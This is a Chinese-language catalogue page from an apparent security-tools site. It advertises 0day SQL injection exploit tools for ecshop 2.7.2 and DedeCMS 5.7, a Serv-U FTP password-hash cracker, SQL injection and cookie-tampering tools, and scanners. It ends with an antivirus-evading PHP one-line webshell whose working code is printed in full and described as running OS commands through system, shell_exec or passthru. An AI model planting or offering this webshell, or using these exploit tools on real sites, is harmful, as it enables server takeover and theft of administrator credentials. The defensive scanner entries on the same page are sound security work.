预览模式: 普通 | 列表


ecshop_2.7.2及以前的版本存在SQL注入漏洞,成功利用该漏洞的攻击者可以读取后台管理员的密码哈希和系统上的任意文件。并可上传Webshell。

flow.php 文件对用户的输入缺乏严格的过滤,导致注入漏洞的产生。
漏洞利用前提:magic_quotes_gpc = off

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1549
                      图/文 赵显阳

钩子是WINDOWS中消息处理机制的一个要点,通过安装各种钩子,应用程序能够设置相应的子例程来监视系统里的消息传递以及在这些消息到达目标窗口程序之前处理它们。 钩子的种类很多,每种钩子可以截获并处理相应的消息,如键盘钩子可以截获键盘消息 ,鼠标钩子可以截获鼠标消息,外壳钩子可以截获启动和关闭应用程序的消息,日志钩 子可以监视和记录输入事件。钩子分为线程专用钩子和全局钩子,线程专用钩子只监视 指定的线程,要监视系统中的所有线程,必须用到全局钩子。对于全局钩子,钩子函数 必须包含在独立的动态链接库(DLL)中,这样才能被各种相关联的应用程序调用。 在windows资源管理器中,执行删除是调用的shell32.dll文件导出的SHFileOperationW这个函数,只要对该函数进行挂钩处理,就可以实现文件防删。
函数SHFileOperation根据Win32程序员参考介绍,是这样描述的:
Performs a copy, move, rename, or delete operation on a file system object.
WINSHELLAPI int WINAPI SHFileOperation(

查看更多...

分类:研究文档 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 5031

WebSmart Web应用漏洞扫描器v1.3


   网站应用安全评估系统即是一款用于Web应用远程安全检测的软件产品。
可下载安装,支持Windows操作系统,
用于对自己的网站进行日常的安全检查。
适用对象:网站规模和数量较小的企业、学校、事业单位等。
价格: 6,000元视频演示

查看更多...

Tags: 扫描器

分类:WebSmart | 固定链接 | 评论: 3 | 引用: 0 | 查看次数: 3252

【河马】Serv-U FTP密码破解工具v1.0



这款工具用于网络管理员评估自己的Serv-U FTP 服务器密码是否强壮,

可用于渗透测试时获取了管理员的ftp密码hash,扩大渗透范围等。有什么

查看更多...

Tags: hash破解

分类:密码哈希解密 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2056

河马挂马检测工具



一、软件简介:
    【河马】挂马检测系统是河马安全网(www.isafe.cc" target="_blank">isafe.cc)出品的一款免费挂马检测软件。
此款软件专为检查WEB Server被入侵种植脚本木马和网页被嵌入的恶意链接而设计。

查看更多...

分类:其它工具软件 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2398

招聘网络营销人员(兼职)

1、利用互联网对公司产品推广及宣传;
2、能较快熟悉本公司的各种产品的相关知识;
3、诚实、勤奋、敬业、责任心强,具有团队合作精神。

待遇:
提成+奖金(300元/月)

查看更多...

Tags: 招聘

分类:人才招聘 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2198

招聘网络营销人员(专职)

1、网历(上网)2年以上,能够熟练使用办公相关软件,熟练利用网络聊天工具 (如qq,msn,旺旺等);
2、利用互联网对公司产品推广及宣传;
3、能较快熟悉本公司的各种产品的相关知识, 建立并完善客户档案;
4、诚实、勤奋、敬业、责任心强,具有团队合作精神。
待遇:
试用期1-3个月

查看更多...

Tags: 招聘

分类:人才招聘 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2125

河马网站Cookie修改器v1.1


河马cookie修改器v1.1,可用于SQL注入等。
只允许会员下载 该文件只允许会员下载! 登录 | 注册

Tags: Cookie

分类:Cookie修改器 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 2505

WebSmart Web应用漏洞扫描器v1.0


   网站应用安全评估系统即是一款用于Web应用远程安全检测的软件产品。
可下载安装,支持Windows操作系统,
用于对自己的网站进行日常的安全检查。
适用对象:网站规模和数量较小的企业、学校、事业单位等。

查看更多...

Tags: 扫描器

分类:WebSmart | 固定链接 | 评论: 9 | 引用: 0 | 查看次数: 3815

dedecmsV5.7SQL注入漏洞(利用工具).



DeDeCmsV5.7及以前的版本存在SQL注入漏洞,成功利用该漏洞的攻击者可以读取后台管理员的密码哈希和系统上的任意文件。

member/ajax_membergroup.php 文件对用户的输入缺乏严格的过滤,导致注入漏洞的产生。

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 6 | 引用: 0 | 查看次数: 2315

河马SQLServer注入工具v1.1

如果存在php+sqlserver数据库的注入点,或asp+sqlserver数据库的注入点,

或jsp+sqlserver数据库的注入点,就可以利用本工具,查询表,字段,数据,这个工具有一个亮

点是支持cookie

和身份验证。

速度很快,一款不错的工具,值得收藏。

这是网上唯一一款支持cookie的注入工具。

点击这里下载

Tags: SQL注入

分类:SQL注入工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2042

河马灰色按钮克星v1.0

本软件可以将灰色按钮(一般是系统不允许点击的)

变为可以使用的,用于有些软件的【下一步】

是灰色的情况。

点击这里下载

Tags: 小工具

分类:其它工具软件 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2151

【河马】 php一句话木马服务端和客户端【免杀版】

软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>

写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,

支持的函数有system,shell_exec,passthru

点击这里下载

Tags: 远控

分类:其它工具软件 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2133
无标题文档